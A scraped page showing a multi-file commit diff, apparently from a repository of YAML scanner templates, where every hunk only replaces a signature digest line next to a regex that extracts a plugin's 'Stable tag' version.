# digest: 4b0a00483046022100d905fc7ab715040289a6e6516f734706fbb19a1a8b5c32d10e5d481514ca7e99022100de6ff64997091ef385eba7e1b2f88387204504c869a5d93994f222d99af87013:922c64590222798bb761d5b6d8e72950 # digest: 4a0a0047304502200eb21eb71677b02888c973ab210cbde34705205a2122f6caa24f5137cab3008c022100d2dea8c52f211de2f8eec6e4e08b5b5670084e6829d28cbd24f925dd486fb041:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a004730450220685907c041d24bb47b1397f231f8b74facea73a0915fa05d7b8ec150fb14cb0f022100fb8cbec5865a6190bc049324679df8c8fc0961b462942b058fa2dfc3fc4a932d:922c64590222798bb761d5b6d8e72950 # digest: 4b0a00483046022100d32c80d1bb55756ac9a2d5763b6cd2dad7ba7f27521b767fe9d9b47205a8d611022100cccf6fa2e1dddfe0d943f5d1fdfd9a5ddbf88fb5428bb9eb8387cf8bf086ec3b:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022073965b5a62d36c00a65166954f32d93eb10b8ebf8a3e0fc541fe71b5558733e4022100b2fe7426281d2ea9f594334cd3087de5d48892feb27f1253dfa2a4c4d558b172:922c64590222798bb761d5b6d8e72950 # digest: 490a00463044022004dc8b2c191923e9d44268cf3c8b3689e839d4b075dd41229046c7d942469b8f02204cc2b00610d23d6d1ac91b1673a74bcaa21f3a34bd413bb12ad6ffa3e6f577a0:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022000a0b2ca7d1d4b5f9c8f6f8ea2c09291f86ad718c6ad37198ec48a2279b007da0221008f23686fb62adebaa6ccb4e85e67463b9b30ffcece5e788b197be1e61dc1d902:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100ee3788b509ff21b9b0a12cf5acfd70278ed056ec132330957cc9608fa2863a3402203e7f0cc571ae68a66855becb8d42fcbd57b95d7bec7c83c68890c2b7c1b4868e:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402203f43527e2330cee2af1ad97a41689d5d27d8996680f626a623e6b2fb1c82b4aa022008b443a277469d585425d5a381417922748510213dde4c834680e0b697f5ad98:922c64590222798bb761d5b6d8e72950 # digest: 490a0046304402202cbf0b7784d15313ce5d5f9173e2e76c31ed4c138488cca9c48c2675c549d51b02206f2bd2a80ca10339f62f16e911e5d7278ee57ec12600ddef76eee919de23499f:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100cb35ff3426b9a8fd30d49d585f037137b535cfe2a16ade552e397e4e44f1f50a022100a5aafdda77b048e9f628f6820f0340a161cf51fcd31d6b2c63663770a8482e1a:922c64590222798bb761d5b6d8e72950 # digest: 4a0a0047304502202d5a6028989e76b86e8f405107f784686c06f6ea5b0510285942ad0ef6068458022100e2c12b741672313c513dcf3913cbb65f79dfbe85b6d0bbfea0ded8850cec67d5:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100d79aaac98682ebf2a3e6c0f8f819a9e9e88897ae856c78bea8f9efba4dbd1775022038917d76887481cf03aabeec2f05735c4433e66f07da33eedbf8c4605dfb961b:922c64590222798bb761d5b6d8e72950 # digest: 490a0046304402205495d064328450f947e304882e24eb98d34b1e5b3237d968d715876e678aab6102203c7c25ae89debb59fdbcaed86e227e87722d79fbf948085b20a79fa84db955a2:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a0047304502207d8729c2646d34127745472379934a8fc989c5fe0560399e3034174c2060b8d3022100e75b9fc56d6446f27a9c3aa81cc225d20a679f38003f2045d923bfa689bb1488:922c64590222798bb761d5b6d8e72950 # digest: 490a0046304402203362eaa84c19aa9effdb58be55d876d78e4d261d89939b64d3c770920c156db90220499b53032c658e9d65c2d9c14a45b364c24f8d78a4f63727619cf9808a7e9230:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a0047304502205e3b2754cbadee3dd5f7e1c2838a0d6619419221e025cdfc994680cd8068524c022100a69b286809d775f512eed8c4ea7c5e2a4f7fa13faf2da6a58bca3d0bb8d49eb3:922c64590222798bb761d5b6d8e72950 # digest: 4b0a00483046022100a822b8e885d31348620503a366c6827fc43bc2736149b488aaf5398ada891101022100cfa4b9c3970ebc686d4b4d5806c4c0714c1599247d7b581bbf1c0bcd12f0b8a9:922c64590222798bb761d5b6d8e72950

Some files were not shown because too many files have changed in this diff Show More